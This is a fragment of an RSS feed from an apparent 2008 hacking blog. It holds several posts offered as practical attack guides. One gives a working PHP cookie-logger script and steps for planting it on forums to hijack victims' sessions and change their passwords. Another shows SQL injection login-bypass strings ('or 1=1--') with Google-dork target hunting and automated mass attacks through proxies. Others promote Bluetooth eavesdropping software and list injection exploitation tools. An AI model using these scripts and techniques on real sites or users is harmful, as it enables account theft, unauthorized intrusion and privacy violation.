		<link>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html#comments</comments>
		<pubDate>Sat, 22 Nov 2008 09:53:22 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Email Hacking]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Orkut Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Account]]></category>
		<category><![CDATA[Cookie]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Logger]]></category>
		<category><![CDATA[MSN]]></category>
		<category><![CDATA[Orkut]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[Stealling]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=377</guid>
		<description><![CDATA[Cookies stores all the necessary Information about one's account , using this information you can hack anybody's account and change his password. If you get the Cookies of theVictim you can Hack any account the Victim is Logged into. A CookieLogger is a Script that is Used to Steal anybodies Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger...Hope you will enjoy Reading it ...]]></description>
			<content:encoded><![CDATA[<p>Cookies stores all the necessary Information about one&#8217;s account , using this information you can hack anybody&#8217;s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.</p>
<p><strong>What is a CookieLogger?</strong></p>
<p>A CookieLogger is a Script that is Used to Steal anybody&#8217;s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.</p>
<p>Today I am going to show How to make your own Cookie Logger&#8230;Hope you will enjoy Reading it &#8230;</p>
<p><strong>Step 1: </strong>Save the notepad file from the link below and Rename it as Fun.gif:</p>
<blockquote><p><a title="Script1" href="http://w18.easy-share.com/1702516956.html" target="_blank">Download it.</a></p></blockquote>
<p><strong>Step 2: </strong>Copy the Following Script into a Notepad File and Save the file as cookielogger.php:</p>
<blockquote><p>$filename = &#8220;logfile.txt&#8221;;<br />
if (isset($_GET["cookie"]))<br />
{<br />
if (!$handle = fopen($filename, &#8216;a&#8217;))<br />
{<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
}<br />
else<br />
{<br />
if (fwrite($handle, &#8220;\r\n&#8221; . $_GET["cookie"]) === FALSE)<br />
{<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
}<br />
}<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
fclose($handle);<br />
exit;<br />
}<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
?&gt;</p></blockquote>
<p><strong>Step 3: </strong>Create a new Notepad File and Save it as logfile.txt</p>
<p><strong>Step 4:</strong> Upload this file to your server</p>
<p>cookielogger.php -&gt; http://www.yoursite.com/cookielogger.php<br />
logfile.txt -&gt; http://www.yoursite.com/logfile.txt (chmod 777)<br />
fun.gif -&gt; http://www.yoursite.com/fun.gif</p>
<p>If you don&#8217;t have any Website then you can use the following Website to get a Free Website which has php support :</p>
<blockquote><p>http://0fees.net</p></blockquote>
<p><strong>Step 5: </strong>Go to the victim forum and insert this code in the signature or a post :</p>
<blockquote><p><a title="Script2" href="http://w14.easy-share.com/1702516964.html" target="_blank">Download it.</a></p></blockquote>
<p><strong>Step 6: </strong>When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:</p>
<blockquote><p>phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9</p></blockquote>
<p><strong>Step 7:</strong> To get the access to the Victim&#8217;s Account you need to replace your cookies with the Victim&#8217;s Cookie. You can use a Cookie Editor for this. The string before &#8220;=&#8221; is the name of the cookie and the string after &#8220;=&#8221; is its value. So Change the values of the cookies in the cookie Editor.</p>
<p><strong>Step 8: </strong>Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim&#8217;s account information.</p>
<p><strong>Note : </strong>Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim&#8217;s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.</p>
<p><strong>Disclaimer: </strong>I don&#8217;t take Responsibility for what you do with this script, served for Educational purpose only. <strong>&#8230;</strong></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=377&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html/feed</wfw:commentRss>
		<slash:comments>56</slash:comments>
		</item>
		<item>
		<title>Eavesdropping on Bluetooth Headsets</title>
		<link>http://www.hungry-hackers.com/2008/11/eavesdropping-on-bluetooth-headsets.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/eavesdropping-on-bluetooth-headsets.html#comments</comments>
		<pubDate>Sat, 22 Nov 2008 05:42:03 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Bluejacking]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Mobile Hacking]]></category>
		<category><![CDATA[Bluetooth]]></category>
		<category><![CDATA[Device]]></category>
		<category><![CDATA[Eavesdropping]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Headsets]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=375</guid>
		<description><![CDATA[Here's a short video in which Joshua Wright demonstrates how a Bluetooth headset can be hijacked, allowing audio to be captured or sent to the device]]></description>
			<content:encoded><![CDATA[<p><span><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="349" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/1c-jzYAH2gw&amp;hl=en&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&amp;border=1" /><embed type="application/x-shockwave-flash" width="425" height="349" src="http://www.youtube.com/v/1c-jzYAH2gw&amp;hl=en&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&amp;border=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></span></p>
<p>Here&#8217;s a short video in which Joshua Wright demonstrates how a <a title="Super Bluetooth Hack 2008(Latest Version)" href="http://www.hungry-hackers.com/2008/07/super-bluetooth-hack-2008-latest.html" target="_self">Bluetooth headset can be hijacked</a>, allowing audio to be captured or sent to the device:</p>
<blockquote><p>Few users realize that Bluetooth headsets can be exploited granting a remote attacker the ability to record and inject audio through the headset while the device is not in an active call. SANS Institute author and senior instructor Joshua Wright demonstrates.</p></blockquote>
<p>All that is necessary is knowing the device address, which can be easily sniffed, and the secret pin, which defaults to 0000. The headset audio is tapped while not in a call, so any room conversation the headset&#8217;s mic can pick up can potentially be listened to remotely.</p>
<p>To Download the software to Hack a Bluetooth Enabled Phone <a title="Super Bluetooth Hack 2008(Latest Version)" href="http://www.hungry-hackers.com/2008/07/super-bluetooth-hack-2008-latest.html" target="_self">Click Here</a>.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=375&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/eavesdropping-on-bluetooth-headsets.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Top 15 SQL Injection Scanners</title>
		<link>http://www.hungry-hackers.com/2008/10/top-15-sql-injection-scanners.html</link>
		<comments>http://www.hungry-hackers.com/2008/10/top-15-sql-injection-scanners.html#comments</comments>
		<pubDate>Fri, 03 Oct 2008 17:47:03 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Database Hacking]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Developers]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Scanner]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Softwares]]></category>
		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=356</guid>
		<description><![CDATA[Web applications allow visitors to submit and retrieve data to/from a database over the Internet. Databases are the heart of most web applications. They hold data needed for web applications to deliver specific content to visitors and provide information to customers, suppliers etc.

SQL Injection is perhaps the most common web-application hacking technique which attempts to pass SQL commands through a web application for execution by the back-end database. The vulnerability is presented when user input is incorrectly sanitized and thereby executed.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">If you are not aware of SQL Injection Attack and How it works you need to read my previous article &#8220;<a rel="bookmark" href="http://www.hungry-hackers.com/2008/01/top-10-tricks-to-exploit-sql-server-systems.html">Top 10 Tricks to exploit SQL Server Systems</a>&#8221; .</p>
<p style="text-align: justify;">While the adoption of web applications for conducting online business has enabled companies to connect seamlessly with their customers, it has also exposed a number of security concerns stemming from improper coding. Vulnerabilities in web applications allow hackers to gain direct and public access to sensitive information (e.g. personal data, login credentials).</p>
<p style="text-align: justify;">Web applications allow visitors to submit and retrieve data to/from a database over the Internet. Databases are the heart of most web applications. They hold data needed for web applications to deliver specific content to visitors and provide information to customers, suppliers etc.</p>
<p style="text-align: justify;"><strong>SQL Injection</strong> is perhaps the most common web-application hacking technique which attempts to pass SQL commands through a web application for execution by the back-end database. The vulnerability is presented when user input is incorrectly sanitized and thereby executed.</p>
<p style="text-align: justify;">Checking for <strong>SQL Injection</strong> vulnerabilities involves auditing your web applications and the best way to do it is by using automated SQL Injection Scanners. We’ve compiled a list of free <strong>SQL Injection Scanners</strong> we believe will be of a value to both web application developers and professional security auditors.</p>
<p style="text-align: justify;"><strong>SQLIer</strong> &#8211; SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. <a href="http://bcable.net/project.php?sqlier" target="_blank">Get SQLIer</a>.</p>
<p style="text-align: justify;"><strong>SQLbftools</strong> &#8211;  SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. <a href="http://www.reversing.org/node/view/11" target="_blank">Get SQLbftools</a>.</p>
<p style="text-align: justify;"><strong>SQL Injection Brute-forcer</strong> &#8211; SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. <a href="http://www.open-labs.org/sqlibf19beta1.tar.gz" target="_blank">Get SQLLibf</a>.</p>
<p style="text-align: justify;"><strong>SQLBrute</strong> &#8211; SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. <a href="http://www.justinclarke.com/security/sqlbrute.py" target="_blank">Get SQLBrute</a>.</p>
<p style="text-align: justify;"><strong>BobCat</strong> &#8211; BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on <a href="http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf" target="_blank">AppSecInc</a> research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. <a href="http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html" target="_blank">Get BobCat</a>.</p>
<p style="text-align: justify;"><strong>SQLMap</strong> &#8211; SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. <a href="http://sqlmap.sourceforge.net/" target="_blank">Get SQLMap</a>.</p>
<p style="text-align: justify;"><span class="style1"><strong>Absinthe</strong> &#8211; </span><span class="style1"> Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. <a href="http://www.0x90.org/releases/absinthe/download.php" target="_blank">Get Absinthe</a>.</span></p>
<p style="text-align: justify;"><strong>SQL Injection Pen-testing Tool</strong> &#8211; <span style="color: #000000;">The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications.</span> <a href="http://sqltool.itdefence.ru/indexeng.html" target="_blank">Get SQL Injection Pen-testing tool</a>.</p>
<p style="text-align: justify;"><span class="hd1"><strong>SQID</strong> &#8211; </span> SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. <a href="http://sqid.rubyforge.org/" target="_blank">Get SQID</a>.</p>
<p style="text-align: justify;"><strong>Blind SQL Injection Perl Tool</strong> &#8211;  	    bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. <a href="http://www.unsec.net/download/bsqlbf.pl" target="_blank">Get Blind SQL Injection Perl Tool</a>.</p>
<p style="text-align: justify;"><strong>SQL Power <span style="text-decoration: line-through;">Injection</span> Injector</strong> &#8211; SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. <a href="http://www.sqlpowerinjector.com/" target="_blank">Get SQL Power Injection</a>.</p>
<p style="text-align: justify;"><strong>FJ-Injector Framwork</strong> &#8211; FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. <a href="http://sourceforge.net/project/showfiles.php?group_id=183841" target="_blank">Get FJ-Injector Framework</a>.</p>
<p style="text-align: justify;"><strong>SQLNinja</strong> &#8211; SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. <a href="http://sqlninja.sourceforge.net/" target="_blank">Get SQLNinja</a>.</p>
<p style="text-align: justify;"><strong>Automagic SQL Injector</strong> &#8211; The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. <a href="http://www.indianz.ch/tools/attack/automagic.zip" target="_blank">Get Automagic SQL Injector</a>.</p>
<p style="text-align: justify;"><strong>NGSS SQL Injector</strong> &#8211; NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. <a href="http://www.indianz.ch/tools/attack/sqlinjector.zip" target="_blank">Get NGSS SQL Injector</a>.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=356&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/10/top-15-sql-injection-scanners.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>List of all the SQL Injection Strings</title>
		<link>http://www.hungry-hackers.com/2008/09/list-of-all-the-sql-injection-strings.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/list-of-all-the-sql-injection-strings.html#comments</comments>
		<pubDate>Sun, 28 Sep 2008 06:27:58 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Database Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hardcore]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Website]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=354</guid>
		<description><![CDATA[One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article <a title="Permanent Link: Top 10 Tricks to exploit SQL Server Systems" rel="bookmark" href="http://www.hungry-hackers.com/2008/01/top-10-tricks-to-exploit-sql-server-systems.html">Top 10 Tricks to exploit SQL Server Systems</a> .</p>
<p style="text-align: justify;">First SEARCH the following Keywords in Google or any Search Engine:</p>
<p style="text-align: justify;">admin\login.asp<br />
login.asp</p>
<p style="text-align: justify;">with these two search string you will have plenty of targets to chose from&#8230;choose one that is Vulnerable</p>
<p style="text-align: justify;"><strong>INJECTION STRINGS: How to use it?</strong></p>
<p style="text-align: justify;">This is the easiest part&#8230;very simple</p>
<p style="text-align: justify;">On the login page just enter something like</p>
<p style="text-align: justify;">user:admin (you dont even have to put this.)<br />
pass:&#8217; or 1=1&#8211;</p>
<p style="text-align: justify;">or</p>
<p style="text-align: justify;">user:&#8217; or 1=1&#8211;<br />
admin:&#8217; or 1=1&#8211;</p>
<p style="text-align: justify;">Some sites will have just a password so</p>
<p style="text-align: justify;">password:&#8217; or 1=1&#8211;</p>
<p style="text-align: justify;">In fact I have compiled a <a title="Combo List" href="#combolist" target="_self">combo list</a> with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.</p>
<p style="text-align: justify;">The one I am interested in are quick access to targets</p>
<p style="text-align: justify;"><strong>PROGRAM</strong></p>
<p style="text-align: justify;">i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string</p>
<p style="text-align: justify;"><strong>combo example:</strong></p>
<p style="text-align: justify;">admin:&#8217; or a=a&#8211;<br />
admin:&#8217; or 1=1&#8211;</p>
<p style="text-align: justify;">And so on. You don&#8217;t have to be admin and still can do anything you want. The most important part is example:&#8217; or 1=1&#8211; this is our basic injection string</p>
<p style="text-align: justify;">Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever</p>
<p style="text-align: justify;">inurl:login.asp<br />
index of:/admin/login.asp</p>
<p style="text-align: justify;">like this: index of login.asp</p>
<p style="text-align: justify;">result:</p>
<p style="text-align: justify;"><a href="http://www3.google.com/search?hl=en&amp;ie=ISO...G=Google+Search" target="_blank"><span style="text-decoration: underline;"><span style="color: blue;">http://www3.google.com/search?hl=en&amp;ie=ISO&#8230;G=Google+Search</span></span></a></p>
<p style="text-align: justify;">17,000 possible targets trying various searches spews out plent more</p>
<p style="text-align: justify;">Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so</p>
<p style="text-align: justify;"><a href="http://www.somesite.com/login.asp" target="_blank"><span style="color: blue;"><span style="text-decoration: underline;">http://www.somesite.com/login.asp</span></span></a><br />
<a href="http://www.another.com/admin/login.asp" target="_blank"><span style="text-decoration: underline;"><span style="color: blue;">http://www.another.com/admin/login.asp</span></span></a></p>
<p style="text-align: justify;">and so on. In a couple of hours you can build up quite a list because I don&#8217;t select all results or spider for log in pages. I then save the list fire up Ares and enter</p>
<p style="text-align: justify;">1) A Proxy list<br />
2) My Target IP list<br />
3) My Combo list<br />
4) Start.</p>
<p style="text-align: justify;">Now I dont want to go into problems with users using Ares..thing is i know it works for me&#8230;</p>
<p style="text-align: justify;">Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.</p>
<p style="text-align: justify;">There you go you should have access to your vulnerable target by now</p>
<p style="text-align: justify;">Another thing you can use the strings in the urls were user=? edit the url to the = part and paste &#8216; or 1=1&#8211; so it becomes</p>
<p style="text-align: justify;">user=&#8217; or 1=1&#8211; just as quick as login process</p>
<p style="text-align: justify;"><a name="combolist"></a><strong>Combo List</strong></p>
<p style="text-align: justify;"><span style="text-decoration: line-through;">There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.</span></p>
<p style="text-align: justify;">As a result of a lot of requests for the list of SQL Injection String and due to lack of time on our behalf to respond to your Comments we have now decided to give the download link for the list of SQL Injection Strings. Now you just need to Subscribe to our RSS Feed via Email and get the Download link at the bottom of the Confirmation Email. Please don&#8217;t Forget to click on the Confirmation Link given in that Email.</p>
<p style="text-align: justify;">Here is the form to Subscribe to our RSS feed via Email:</p>
<form style="border: 0px solid #cccccc; padding: 3px; text-align: justify;" action="http://www.feedburner.com/fb/a/emailverify" method="post">
<input id="feed_form" style="width: 250px;" onclick="this.value='';" name="email" type="text" value="Enter your Email Address" />
<input name="url" type="hidden" value="http://feeds.feedburner.com/~e?ffid=1825094" />
<input name="title" type="hidden" value="Hacking Truths" />
<input name="loc" type="hidden" value="en_US" />
<input type="submit" value="Subscribe" /></form>
<p style="text-align: justify;">Happy Hunting</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=354&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/list-of-all-the-sql-injection-strings.html/feed</wfw:commentRss>
		<slash:comments>352</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching using disk: basic
Object Caching 1089/1287 objects using disk: basic

Served from: hungry-hackers.com @ 2012-02-10 13:08:00 -->
